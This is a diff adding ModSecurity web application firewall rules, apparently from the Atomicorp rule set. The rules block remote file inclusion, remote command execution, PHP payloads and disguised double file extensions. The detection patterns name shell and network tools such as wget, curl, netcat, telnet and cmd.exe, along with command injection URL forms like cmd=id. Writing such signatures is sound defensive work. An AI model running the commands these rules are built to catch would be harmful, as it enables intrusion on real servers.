+SecRule ARGS|REQUEST_URI|!ARGS:SAMLResponse|!ARGS:templatecode|!ARGS:areas "@pm http:// https:// ftp:// ftps:// ogg:// tls://  zlib:// gopher:// compress.zlib" "phase:2,id:333819,t:none,t:replaceNulls,t:compressWhitespace,t:urlDecodeUni,multimatch,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334371,t:none,pass,nolog,noauditlog,skipAfter:END_INJECTION_RULES_MULTI"
+
+# Rule 340038:
+# Header anomaly for texture compression
+SecRule REQUEST_HEADERS:Content-Encoding "Texture" "phase:1,log,auditlog,deny,status:501,msg:'Atomicorp.com WAF Rules: Header Anomaly (Texture)',id:340038"
+
+
+SecRule REQUEST_METHOD "!(?:GET|POST)" "id:371112,phase:2,t:none,skipAfter:END_INJECTION_RULES_MULTI,nolog,noauditlog,pass"
+
+# Rule 340163: Generic PHP code injection protection in URI w/ anti-evasion and multimatch
+SecRule REQUEST_URI "(?:\/(?:(?:wp-admin\/(page|post|widgets|network/site-settings\.php|link|options|themes/basic/themify/img\.php\?src=|admin\.php?cf/cf\.php)|admin\/(?:edittemplate|webpage_update|theme-options|add_edit_)|(?:signup|cpinquiry|profile))\.php|p(?:(?:hpbb\/install\/install\.ph|l\/download\?file=htt)p|roxy\/cb_proxy\.\?a=http:\/\/)|i(?:ndex\.php\/admin\/system_config\/save\/section\/payment\/|mp\/compose\.php)|tiki-(?:objectpermissions|editpage|view_cache)|jomsocial\/[a-z]+\/(?:edit|add))|^(?:\/(?:(?:[a-z0-9\-]+\/events\?(?:utm_|trk_)|node\/[0-9]+\/(?:edit|add)|[a-z]+\/unsubscribe)|(?:mysqldumper\/dump|xmlrpc)\.php$|go\.php\?u=affilorama&t=http:\/\/|\.services\/sitelogout)|/(?:b/ss/mxmacromedia|horde/services/go|node/add|cas/))|(?:(?:jw_allvideos_player|mod_mp3player)\?(?:file|playlist)=htt|ubbthreads\/admin\/dofeatures\.ph)p|ad-?server\/adjs|\?mode=addshout|^/administrator/index\.php\?option=com_rsform|^/index\.php/profile/register/registerprofile|^/[a-z]+/edit|^/(?:admin/media|elements)/(?:s(?:ave|ettings?)|appearance)/|^/index\.php\?loginerror=incorrectpassword$|^/panel\?comd=nlwebform|^/cocms/index\.php\?s=|^/ls_javascript_combine/|^/index\.php\?option=com_rsform|^/killboard/\?a=admin_idfeedsyndication|^/api/users|^/numo/module/form_handler/|^/admin/add_edit_document|^/\?br=|^/app\.php/dl_ext/\?view=upload|^/index\.php\?option=com_uniform|^/\?_task=mail|^/index\.php\?p=admin/actions/elements/|^/?amoptimizer_bundle_check|^/\?wc-ajax|^/index\.php\?get=film&doaction=resultat)" "phase:2,id:333702,rev:6,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_MULTI"
+
+SecRule ARGS|!ARGS:/^acf/|!ARGS:/^colissimo/|!ARGS:sld|!ARGS:carpeta|!ARGS:imej|!ARGS:/saml/|!ARGS:/affwp/|!ARGS:/search/|!ARGS:/containers/|!ARGS:r|!ARGS:/refid/|!ARGS:/r3f5x9JS/|!ARGS:chl|!ARGS:/^tw247/|!ARGS:ujk|!ARGS:_custom_|!ARGS:loc_db|!ARGS:/^woo/|!ARGS:/^replace/|!ARGS:pwd|!ARGS:/^objectTo/|!ARGS:1_1_8|!ARGS:/journal/|!ARGS:username|!ARGS:/website/|!ARGS:video|!ARGS:fb|!ARGS:/cdn/|!ARGS:/^xing/|!ARGS:directories|!ARGS:/bookmark/|!ARGS:/case_name/|!ARGS:f_success|!ARGS:f_error|!ARGS:/userOption/|!ARGS:name|!ARGS:/target/|!ARGS:/^_d$/|!ARGS:klarna_order|!ARGS:/to$/|!ARGS:/schema/|!ARGS:/brochure/|!ARGS:protocol|!ARGS:str|!ARGS:/query/|!ARGS:/from/|!ARGS:/forward/|!ARGS:/_script/|!ARGS:ads|!ARGS:/^addon-/|!ARGS:application|!ARGS:/graphic/|!ARGS:/virtuemart/|!ARGS:UF_VK|!ARGS:/powermail/|!ARGS:mp4|!ARGS:/confirmation/|!ARGS:/cloudflare/|!ARGS:/^ref_/|!ARGS:/hsw_ash/|!ARGS:/_online_/|!ARGS:/reason/|!ARGS:installFull|!ARGS:b2w|!ARGS:/^es-field/|!ARGS:term|!ARGS:/email/|!ARGS:/source_array/|!ARGS:/button/|!ARGS:/bestand/|!ARGS:/^request/|!ARGS:m_wb|!ARGS:/customfield/|!ARGS:/shopvk/|!ARGS:/keyword/|!ARGS:embed|!ARGS:/^cmsform/|!ARGS:social_network|!ARGS:scope|!ARGS:/^vfb-/|!ARGS:to|!ARGS:pu|!ARGS:/^meta/|!ARGS:sima|!ARGS:/movie/|!ARGS:dns|!ARGS:source_code|!ARGS:/_form/|!ARGS:listserv|!ARGS:p_zoho|!ARGS:sugarroot|!ARGS:cyswllt|!ARGS:/^attribute/|!ARGS:/^channel/|!ARGS:/^wdf_joodb/|!ARGS:options[alter][path]|!ARGS:/css_frame/|!ARGS:ad_code|!ARGS:tickets|!ARGS:war|!ARGS:slug|!ARGS:/whereto/|!ARGS:pack|!ARGS:/extra_info/|!ARGS:origem|!ARGS:str_sitio|!ARGS:post-id|!ARGS:/metatags/|!ARGS:xml|!ARGS:radio|!ARGS:shire|!ARGS:/^svc_id/|!ARGS:/live$/|!ARGS:RelayState|!ARGS:ds_source|!ARGS:/contact_/|!ARGS:next|!ARGS:clip|!ARGS:txt|!ARGS:kotisivu|!ARGS:mb|!ARGS:jibber|!ARGS:wordpress_extra|!ARGS:origin|!ARGS:pattern_select|!ARGS:fail|!ARGS:success|!ARGS:move_to|!ARGS:/^listingfields/|!ARGS:svc_id|!ARGS:/_contact/|!ARGS:hq|!ARGS:/flsrv/|!ARGS:svc_id|!ARGS:/foto/|!ARGS:junkWords|!ARGS:name_ip|!ARGS:/stream/|!ARGS:canonical|!ARGS:/addy/|!ARGS:rel_path|!ARGS:aim|!ARGS:/^field/|!ARGS:details|!ARGS:/^complete_action/|!ARGS:profile_id|!ARGS:api|!ARGS:/^option_value/|!ARGS:button_src|!ARGS:cc_list_id|!ARGS:/buzz/|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:^/xcpr_/|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:/export/|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/^pass/|!ARGS:/password/|!ARGS:/note/|!ARGS:/form_/|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:embed_code|!ARGS:/^input_/|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:wlp|!ARGS:hp|!ARGS:refsrc|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:/home/|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/^obj_/|!ARGS:/photo/|!ARGS:/media/|!ARGS:/icon/|!ARGS:back|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/twitter/|!ARGS:/flickr/|!ARGS:/youtube/|!ARGS:parent_name|!ARGS:/blog/|!ARGS:/vid/|!ARGS:_update_failure|!ARGS:_update_success|!ARGS:hdwok|!ARGS:hdwnook|!ARGS:OpenID|!ARGS:/^hilit/|!ARGS:/reciprocal/|!ARGS:importremote|!ARGS:/callback/|!ARGS:/sponsors/|!ARGS:/^akID/|!ARGS:want2Read|!ARGS:/thumb/|!ARGS:subject|!ARGS:direct|!ARGS:fflv|!ARGS:direct|!ARGS:source_location/|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:go|!ARGS:resolution|!ARGS:/link/|!ARGS:/vimeo/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:/^utm/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:ucapi|!ARGS:clickTag1|!ARGS:rf|!ARGS:/title/|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:/^clickTagFrame/|!ARGS:/^attr/|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:confirm|!ARGS:/^groups/|!ARGS:prodDownload|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:/^GARS_existing/|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:/body/|!ARGS:/^product_long/|!ARGS:/server/|!ARGS:/content/|!ARGS:/banner/|!ARGS:heading|!ARGS:cl_post|!ARGS:/msg/|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:/footer/|!ARGS:FAQTitle|!ARGS:/host/|!ARGS:/text/|!ARGS:/Piwik/|!ARGS:fetch|!ARGS:/pingback/|!ARGS:/http/|!ARGS:mesg|!ARGS:forward|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:u|!ARGS:/header/|!ARGS:action|!ARGS:cptpl_dir|!ARGS:arg6|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:stretch|!ARGS:cat_sponsor|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:var_value[usps_labels_help_2]|!ARGS:/story/|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:soundname|!ARGS:/^bbcode_/|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:paypal_ipn|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:base1|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:source|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:sig|!ARGS:KT_Update1|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:sm_b_style|!ARGS:/^css/|!ARGS:introduction|!ARGS:register_at|!ARGS:revnews_ad_120|!ARGS:option[78]|!ARGS:/ftp/|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:/wpforms/|!ARGS:answer|!ARGS:intro|!ARGS:/about_us/|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:clickTAG|!ARGS:problem|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redir/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:helpbox|!ARGS:oaparams|!ARGS:resource|!ARGS:/^wimpy/|!ARGS:/altTag/|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:stories_cat|!ARGS:view|!ARGS:howhear|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:/signature/|!ARGS:disc|!ARGS:storage_path|!ARGS:utmr|!ARGS:Query|!ARGS:steps|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:/^wimpy/|!ARGS:/_ref/|!ARGS:/^pr_/|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:ret|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:area|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:st_widget|!ARGS:def|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:Store_OUI_GlobalFooter|!ARGS:map|!ARGS:/^dynafield/|!ARGS:wysiwyg|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:code|!ARGS:/^k2extra/|!ARGS:github|!ARGS:linkedin|!ARGS:stack_overflow  "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)://(.*)$"  "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,multimatch,id:340163,rev:308,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection Attack Blocked (Unauthorized URL detected as argument)',chain"
+SecRule TX:1 "!@beginsWith %{request_headers.host}" "t:none,t:lowercase"
+#SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+SecMarker END_INJECTION_RULES_MULTI
+
+
+#Remote command protection rules
+SecRule REQUEST_URI|ARGS|!ARGS:fileContent|!ARGS:/msg/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/body/|!ARGS:/message/|!ARGS:/text/|!ARGS:templatecode|!ARGS:areas|!ARGS:/illegalusernames/|!ARGS:/image/|!ARGS:resolution|!ARGS:depth|!ARGS:/email/|!ARGS:/comment/|!ARGS:mailbox|!ARGS:/descr/|!ARGS:/resolution/|!ARGS:/solution/|!ARGS:/txt/|!ARGS:body|!ARGS:/message/|!ARGS:/content/|!ARGS:/password/|!ARGS:FoxyData|!ARGS:/jform/|!ARGS:areas|!ARGS:templatecode|!ARGS:site_first|!ARGS:sendDescription|!ARGS:templatecode|!ARGS:areas|!ARGS:wpSummary|!ARGS:/keyword/ "@pm cd perl killall python rpm yum apt-get emerge lynx links mkdir elinks pwd wget ftpget lwp- id uname cvs svn rcp scp ssh rsh sftp netstat netcat rexec smbclient ftp curl telnet cc g++ whoami kill rm rsync nasm cmd command git" "phase:2,id:334820,t:none,t:urlDecodeUni,t:cmdline,pass,nolog,noauditlog,skip:1"
+#        SecAction phase:2,id:354372,t:none,pass,nolog,noauditlog,skipAfter:END_CMD2_ATTACKS
+# Rule 340023: Generic remote comand attack signature
+SecRule REQUEST_URI|ARGS|!ARGS:fileContent|!ARGS:/disallowed/|!ARGS:/msg/|!ARGS:post|!ARGS:/sql/|!ARGS:prefix|!ARGS:/body/|!ARGS:/search/|!ARGS:/message/|!ARGS:/text/|!ARGS:templatecode|!ARGS:areas|!ARGS:/illegalusernames/|!ARGS:/image/|!ARGS:resolution|!ARGS:depth|!ARGS:/email/|!ARGS:/comment/|!ARGS:mailbox|!ARGS:/descr/|!ARGS:/resolution/|!ARGS:/solution/|!ARGS:/txt/|!ARGS:body|!ARGS:/message/|!ARGS:/content/|!ARGS:/password/|!ARGS:FoxyData|!ARGS:/jform/|!ARGS:areas|!ARGS:templatecode|!ARGS:site_first|!ARGS:sendDescription|!ARGS:templatecode|!ARGS:areas|!ARGS:wpSummary|!ARGS:/keyword/ "(?:\b(?:cd|perl|killall|traceroute|python|r(?:pm|sync)|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|(?:w|ftp)get|lwp-(?:download|request|mirror|rget)|id|uname|cvs|svn|(?:s|r)(?:cp|sh)|n(?:et(?:stat|cat)|asm)|rexec|smbclient|t?ftp|ncftp|curl|telnet|g(?:cc|it)|cc|g\+\+|whoami)\b |\brm\b \-[a-z] |\bcat\b /|\bc(?:ommand|md)\.(?:exe|com)\b ?(?:/.*)?/[ck] )"  "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:cmdline,multimatch,capture,id:340023,rev:7,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  remote command execution',logdata:'%{TX.0}'"
+
+SecMarker END_CMD2_ATTACKS
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/*|!ARGS:jql|!ARGS:/^jform/|!ARGS:ausgabe|!ARGS:before_head|!ARGS:/jql/|!ARGS:img_title_format|!ARGS:headcode|!ARGS:/prod_/|!ARGS:/custom-js/|!ARGS:code|!ARGS:jqanote|!ARGS:/html/|!ARGS:/footer/|!ARGS:/message/|!ARGS:/header/|!ARGS:/scripttag/|!ARGS:input_10|!ARGS:/^tb/|!ARGS:param.code|!ARGS:templatecode|!ARGS:teaser_js|!ARGS:/^rsargs/|!ARGS:areas|!ARGS:/note/|!ARGS:printinfo|!ARGS:announcement|!ARGS:/content/|!ARGS:/wysiwyg/|!ARGS:pages|!ARGS:html|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:server_validation|!ARGS:/^data/|!ARGS:tv2|!ARGS:snippet|!ARGS:ausgabe|!ARGS:response|!ARGS:cs_preview_state|!ARGS:/editfile/|!ARGS:yaml|!ARGS:sqzr|!ARGS:/^_popupally/|!ARGS:SAMLResponse|!ARGS:/ARGS:/field_id/|!ARGS:codetocheck|!ARGS:/shortcode/|!ARGS:wpSummary|!ARGS:source|!ARGS:Form|!ARGS:/comment/|!ARGS:/field_image/|!ARGS:myDevEditControl_html|!ARGS:/details/|!ARGS:UserData|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:parent_name|!ARGS:topic|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/^acf/|!ARGS:/desc/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:properties|!ARGS:params.code|!ARGS:php|!ARGS:code|!ARGS:/database/|!ARGS:SAMLResponse|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:templatecode|!ARGS:areas|!ARGS:comment|!ARGS:/kaliforms/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:definition "@rx (?i)\b(?:i(?:s(?:_(?:in(?:t(?:eger)?|finite)|n(?:u(?:meric|ll)|an)|(?:calla|dou)ble|s(?:calar|tring)|f(?:inite|loat)|re(?:source|al)|l(?:ink|ong)|a(?:rray)?|object|bool)|set)|n(?:(?:clud|vok)e|t(?:div|val))|(?:mplod|dat)e|conv)|s(?:t(?:r(?:(?:le|sp)n|coll)|at)|(?:e(?:rializ|ttyp)|huffl)e|i(?:milar_text|zeof|nh?)|p(?:liti?|rintf)|(?:candi|ubst)r|y(?:mlink|slog)|o(?:undex|rt)|leep|rand|qrt)|f(?:ile(?:(?:siz|typ)e|owner|pro)|l(?:o(?:atval|ck|or)|ush)|(?:rea|mo)d|t(?:ell|ok)|unction|close|gets|stat|eof)|c(?:h(?:o(?:wn|p)|eckdate|root|dir|mod)|o(?:(?:(?:nsta|u)n|mpac)t|sh?|py)|lose(?:dir|log)|(?:urren|ryp)t|eil)|e(?:x(?:(?:trac|i)t|p(?:lode)?)|a(?:ster_da(?:te|ys)|ch)|r(?:ror_log|egi?)|mpty|cho|nd)|l(?:o(?:g(?:1[0p])?|caltime)|i(?:nk(?:info)?|st)|(?:cfirs|sta)t|evenshtein|trim)|d(?:i(?:(?:skfreespac)?e|r(?:name)?)|e(?:fined?|coct)|(?:oubleva)?l|ate)|r(?:e(?:(?:quir|cod|nam)e|adlin[ek]|wind|set)|an(?:ge|d)|ound|sort|trim)|m(?:b(?:split|ereg)|i(?:crotime|n)|a(?:i[ln]|x)|etaphone|y?sql|hash)|u(?:n(?:(?:tain|se)t|iqid|link)|s(?:leep|ort)|cfirst|mask)|a(?:s(?:(?:se|o)rt|inh?)|r(?:sort|ray)|tan[2h]?|cosh?|bs)|t(?:e(?:xtdomain|mpnam)|a(?:int|nh?)|ouch|ime|rim)|h(?:e(?:ader(?:s_(?:lis|sen)t)?|brev)|ypot|ash)|p(?:a(?:thinfo|ck)|r(?:intf?|ev)|close|o[sw]|i)|g(?:et(?:t(?:ext|ype)|date)|mdate)|o(?:penlog|ctdec|rd)|b(?:asename|indec)|n(?:atsor|ex)t|k(?:sort|ey)|quotemeta|wordwrap|virtual|join)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:removeComments,t:compressWhiteSpace,t:lowercase,msg:'Atomicorp.com WAF Rules: PHP payload detected',id:380026,rev:24,logdata:'%{TX.0}',severity:'2',tag:'SQLi',tag:'RCE'"
+
+############ PHP URL ATTACKS ####################
+#
+#PHP applications
+SecRule REQUEST_FILENAME "\.php" "phase:2,id:333820,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334372,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_GENERIC_ATTACKS"
+
+# Rule 340117: General [url] php forum protections (phpbb and others, to protect against script injection attacks in url links)
+SecRule REQUEST_URI|ARGS|!ARGS:templatecode|!ARGS:areas "\[url ?= ?(?:script|javascript|applet|about|chrome|activex|qx?ss|embed):/.*\].*\[ ?/ ?url ?\]"  "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340117,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: General [url] php forum protections'"
+
+# Rule 340039: generic php attack sigs
+SecRule REQUEST_FILENAME "!(/mod_cmd/index\.php)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,chain,id:340039,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP command injection attempt'"
+SecRule REQUEST_URI "(?:&(?:cmd|command)=(?:id|uname) |cmd\?(?:cmd|command)=|(?:spy|cmd|cmd_out|sh)\.(?:gif|jpg|png|bmp|txt)\?&(?:cmd|command)=|\.php\?&(?:cmd|command)=)"
+
+# Rule 340137: Generic PHP avatar upload exploits
+#SecRule REQUEST_BODY "content-disposition\: form-data\; name=\"avatar\"\;" 	"phase:2,deny,status:403,t:none,t:lowercase,t:compressWhitespace,phase:2,id:340137,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHPBB avatar exploit',chain"
+#SecRule REQUEST_BODY "\<\? ?php" chain
+#SecRule REQUEST_BODY "\? ?>"
+#
+# Rule 340021: PHP Injection Attack generic signature
+#SecRule REQUEST_URI|ARGS|!ARGS:templatecode|!ARGS:areas|!ARGS:/description/|!ARGS:/resolution/|!ARGS:/problem/ "(?:\?(?:(?:local|include|pear|squizlib)_path|action|content|dir|name|menu|pm_path|pathtoroot|cat|pagina|path|include_location|root|page|gorumdir|site|topside|pun_root|open|seite)=(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:cmd|command)=(?:cd|\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |lwp-(?:download|request|mirror|rget) |uname|cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm \-[a-z]))"  	"phase:2,deny,status:403,t:none,t:lowercase,t:replaceNulls,t:compressWhitespace,t:normalisePath,id:340021,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: PHP Injection Attack 1'"
+#SecRule REQUEST_URI  "!(/lightboxjs\.php\?path=http:/)"  "t:none,t:lowercase"
+
+
+# Rule 340022: PHP Injection Attack generic signature
+#SecRule REQUEST_URI  "\.php\?(?:(?:(?:local|include|pear|squizlib)_path|action|content|dir|name|menu|pm_path|pagina|path|pathtoroot|cat|include_location|gorumDir|root|page|site|topside|pun_root|open|seite)=(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|.*(?:cmd|command)=(?:cd|\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(?:download|request|mirror|rget) |id|uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat)|rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z]))" 	"capture,chain,id:340022,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: PHP Injection Attack 2',logdata:'%{TX.0}'"
+#SecRule REQUEST_URI "!(/lightboxjs\.php\?path=http://)"
+
+
+SecMarker END_PHP_GENERIC_ATTACKS
+
+
+############## BAD FILE NAMES #########################
+#ZenPhoto uses weird extensions when its using mod_rewite
+#zp_user_auth
+
+SecRule REQUEST_URI "@pm .gif.txt .gif.dat .jpeg.txt .jpeg.dat .jpg.txt .jpg.dat .png.txt .png.dat .bmp.txt .bmp.dat .php.jpg .php.jpeg .php.flv .php.gif .php.mp3 .php.mp4 .php.mpg .php.mpeg .php.png .php.bmp .php.tif .php.txt .php.dat .php.avi .php.wmv .php.mp3" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,id:340035,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Bogus file extensions'"
+
+SecRule REQUEST_FILENAME "@pm .jpg.php .gif.php .png.php .jsp;gif .jsp;jpg .jsp;png" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,id:341137,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Potentially Bogus PHP file'"
+
+#SecMarker END_BAD_FILE_NAMES
+
+############# GENERIC COMMAND ATTACK SIGS ##############
+#SecRule REQUEST_URI "@pm perl ; ' | nc telnet sh exec ogg gopher http ftp lynx wget links curl ogg:// tls://  gopher:// cp @ rsync ftp cvs svn traceroute"         "phase:2,pass,nolog,noauditlog,skip:1"
+#SecAction phase:2,pass,nolog,noauditlog,skipAfter:END_CMD_INJECTION_2
+#
+# Rule 340037: generic attack sig
+#SecRule REQUEST_URI "(?:cd |\;|php |echo |perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |wget |lwp-(?:download|request|mirror|rget) |id|uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |g?cc |cpp |g\+\+ |/bin/(xterm|id|bash|sh|echo|kill|chmod|ch?sh|python|perl|nasm|ping|mail))" 	"id:340037,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Generic command injection'"
+
+# Rule 3400XX: Generic argument protection rule against bad meta characters
+#SecRule "ARGS" "!^[a-z0-9.&/?@_%=:;, -]+$"
+
+# Rule 340059: traceroute command attempt
+#SecRule REQUEST_URI  "traceroute" 	"chain,id:340059,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Command attempt (traceroute)'"
+#SecRule REQUEST_URI " (?:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"
+
+# Rule 340083: very experimental generic remote download sig
+# These are VERY experiemental, please report false positives/negatives, etc.
+# foo IP or FQDN, or foo http/https/ftp://whatever
